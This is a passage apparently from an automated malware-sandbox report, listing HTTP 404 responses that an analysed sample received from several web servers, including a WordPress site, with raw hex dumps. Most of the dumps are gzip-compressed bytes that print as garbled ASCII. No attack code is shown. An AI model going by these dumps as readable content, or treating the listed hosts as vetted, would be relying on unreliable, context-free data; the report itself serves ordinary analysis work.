                Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Wed, 03 Jul 2024 13:59:04 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 596
                Connection: close
                Date: Wed, 03 Jul 2024 13:59:06 GMT
                Server: Apache
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 13:59:25 GMT
                Server: Apache
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                Upgrade: h2,h2c
                Connection: Upgrade
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                Content-Length: 16449
                Content-Type: text/html; charset=UTF-8
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 b5 b2 61 2d 71 2e b3 c1 61 db f6 04 4b db b5 4f 6e ce 01 f5 4c 51 ce ff f8 df 46 68 fb 4c 32 f8 e7 31 ec 36 2b 1b 19 91 b9 9b b3 99 50 5c cf 5a ef 67 19 a4 fa 83 78 07 ce 09 15 5b 32 26 8b 5a c8 2c fc d5 c8 5a b0 84 fe a5 fd 4b db b6 66 2d 6d e2 5f da c5 6a ed 2f 08 6e e0 97 76 51 fc 4b bb 3b 6c 75 5a fd 5f da 97 bd bb cb de 2f ed 5a b3 06 77 0e eb 5b 99 8a f1 62 a7 f1 f3 f0 b0 b0 40 c3 df 6f 4b 40 3c f9 bb ce 4d 04 b5 60 51 43 ef a0 90 45 d9 12 bf 80 df d7 e2 97 f6 2c a3 42 45 32 e7 be d9 07 5b 04 8a 32 8a 3b 02 9c b8 95 0a d5 fa 60 7f 37 05 33 be 68 0d 5b c3 da fd fd e8 ac fd f9 6b f2 53 22 2c 99 08 09 04 7f 59 ee 34 8d 41 81 c1 b6 9c 7c de 3e 7b 3d c9 55 e4 77 59 17 4d d5 58 4c 99 21 ba 69 9b 30 5a c5 49 54 87 c6 c2 99 79 f1 e6 c6 0b 9b 67 99 36 ee 27 b0 ce 06 d0 74 22 c5 13 4b b3 a0 ae 60 46 be 41 e0 46 6b ca 64 0e 3f 4c ea 8d fb 91 05 6b 11 e6 9d d3 06 b5 6a 59 70 7f c4 89 eb ba f9 3f de fd f0 e7 96 75 06 37 27 26 f3 ba 6b 34 ee 51 8c 28 f1 ed ee ef d7 ed b3 3a f6 f0 d4 a0 15 e1 a8 e6 47 88 5c bd d3 ec 34 f1 ce d4 94 e1 2e 04 77 c9 e6 9a 80 88 13 d7 c0 00 4e 2d 7f c2 5d d6 1d a6 77 1a a3 72 00 cf f2 af 42 b9 7e ef 4b 63 d8 bc 0e ad 18 39 f9 45 22 77 76 0a 74 8b 63 62 a3 69 c6 f5 4f e0 a4 0a 4e cd 97 62 d3 18 19 70 b9 51 c4 b5 00 4d 30 af af f7 8a f2 35 16 cb 47
                Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 13:59:28 GMT
                Server: Apache
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                Upgrade: h2,h2c
                Connection: Upgrade
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                Content-Length: 16449
                Content-Type: text/html; charset=UTF-8
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 b5 b2 61 2d 71 2e b3 c1 61 db f6 04 4b db b5 4f 6e ce 01 f5 4c 51 ce ff f8 df 46 68 fb 4c 32 f8 e7 31 ec 36 2b 1b 19 91 b9 9b b3 99 50 5c cf 5a ef 67 19 a4 fa 83 78 07 ce 09 15 5b 32 26 8b 5a c8 2c fc d5 c8 5a b0 84 fe a5 fd 4b db b6 66 2d 6d e2 5f da c5 6a ed 2f 08 6e e0 97 76 51 fc 4b bb 3b 6c 75 5a fd 5f da 97 bd bb cb de 2f ed 5a b3 06 77 0e eb 5b 99 8a f1 62 a7 f1 f3 f0 b0 b0 40 c3 df 6f 4b 40 3c f9 bb ce 4d 04 b5 60 51 43 ef a0 90 45 d9 12 bf 80 df d7 e2 97 f6 2c a3 42 45 32 e7 be d9 07 5b 04 8a 32 8a 3b 02 9c b8 95 0a d5 fa 60 7f 37 05 33 be 68 0d 5b c3 da fd fd e8 ac fd f9 6b f2 53 22 2c 99 08 09 04 7f 59 ee 34 8d 41 81 c1 b6 9c 7c de 3e 7b 3d c9 55 e4 77 59 17 4d d5 58 4c 99 21 ba 69 9b 30 5a c5 49 54 87 c6 c2 99 79 f1 e6 c6 0b 9b 67 99 36 ee 27 b0 ce 06 d0 74 22 c5 13 4b b3 a0 ae 60 46 be 41 e0 46 6b ca 64 0e 3f 4c ea 8d fb 91 05 6b 11 e6 9d d3 06 b5 6a 59 70 7f c4 89 eb ba f9 3f de fd f0 e7 96 75 06 37 27 26 f3 ba 6b 34 ee 51 8c 28 f1 ed ee ef d7 ed b3 3a f6 f0 d4 a0 15 e1 a8 e6 47 88 5c bd d3 ec 34 f1 ce d4 94 e1 2e 04 77 c9 e6 9a 80 88 13 d7 c0 00 4e 2d 7f c2 5d d6 1d a6 77 1a a3 72 00 cf f2 af 42 b9 7e ef 4b 63 d8 bc 0e ad 18 39 f9 45 22 77 76 0a 74 8b 63 62 a3 69 c6 f5 4f e0 a4 0a 4e cd 97 62 d3 18 19 70 b9 51 c4 b5 00 4d 30 af af f7 8a f2 35 16 cb 47
                Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 13:59:31 GMT
                Server: Apache
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                Upgrade: h2,h2c
                Connection: Upgrade
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Newfold-Cache-Level: 2
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                Content-Length: 16449
                Content-Type: text/html; charset=UTF-8
                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 b5 b2 61 2d 71 2e b3 c1 61 db f6 04 4b db b5 4f 6e ce 01 f5 4c 51 ce ff f8 df 46 68 fb 4c 32 f8 e7 31 ec 36 2b 1b 19 91 b9 9b b3 99 50 5c cf 5a ef 67 19 a4 fa 83 78 07 ce 09 15 5b 32 26 8b 5a c8 2c fc d5 c8 5a b0 84 fe a5 fd 4b db b6 66 2d 6d e2 5f da c5 6a ed 2f 08 6e e0 97 76 51 fc 4b bb 3b 6c 75 5a fd 5f da 97 bd bb cb de 2f ed 5a b3 06 77 0e eb 5b 99 8a f1 62 a7 f1 f3 f0 b0 b0 40 c3 df 6f 4b 40 3c f9 bb ce 4d 04 b5 60 51 43 ef a0 90 45 d9 12 bf 80 df d7 e2 97 f6 2c a3 42 45 32 e7 be d9 07 5b 04 8a 32 8a 3b 02 9c b8 95 0a d5 fa 60 7f 37 05 33 be 68 0d 5b c3 da fd fd e8 ac fd f9 6b f2 53 22 2c 99 08 09 04 7f 59 ee 34 8d 41 81 c1 b6 9c 7c de 3e 7b 3d c9 55 e4 77 59 17 4d d5 58 4c 99 21 ba 69 9b 30 5a c5 49 54 87 c6 c2 99 79 f1 e6 c6 0b 9b 67 99 36 ee 27 b0 ce 06 d0 74 22 c5 13 4b b3 a0 ae 60 46 be 41 e0 46 6b ca 64 0e 3f 4c ea 8d fb 91 05 6b 11 e6 9d d3 06 b5 6a 59 70 7f c4 89 eb ba f9 3f de fd f0 e7 96 75 06 37 27 26 f3 ba 6b 34 ee 51 8c 28 f1 ed ee ef d7 ed b3 3a f6 f0 d4 a0 15 e1 a8 e6 47 88 5c bd d3 ec 34 f1 ce d4 94 e1 2e 04 77 c9 e6 9a 80 88 13 d7 c0 00 4e 2d 7f c2 5d d6 1d a6 77 1a a3 72 00 cf f2 af 42 b9 7e ef 4b 63 d8 bc 0e ad 18 39 f9 45 22 77 76 0a 74 8b 63 62 a3 69 c6 f5 4f e0 a4 0a 4e cd 97 62 d3 18 19 70 b9 51 c4 b5 00 4d 30 af af f7 8a f2 35 16 cb 47
                Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.20.1
                Date: Wed, 03 Jul 2024 13:59:44 GMT
                Content-Type: text/html
                Content-Length: 3650
                Connection: close
                ETag: "663a05b6-e42"
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.20.1
                Date: Wed, 03 Jul 2024 13:59:47 GMT
                Content-Type: text/html
                Content-Length: 3650
                Connection: close
                ETag: "663a05b6-e42"
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.20.1
                Date: Wed, 03 Jul 2024 13:59:49 GMT
                Content-Type: text/html
                Content-Length: 3650
                Connection: close
                ETag: "663a05b6-e42"
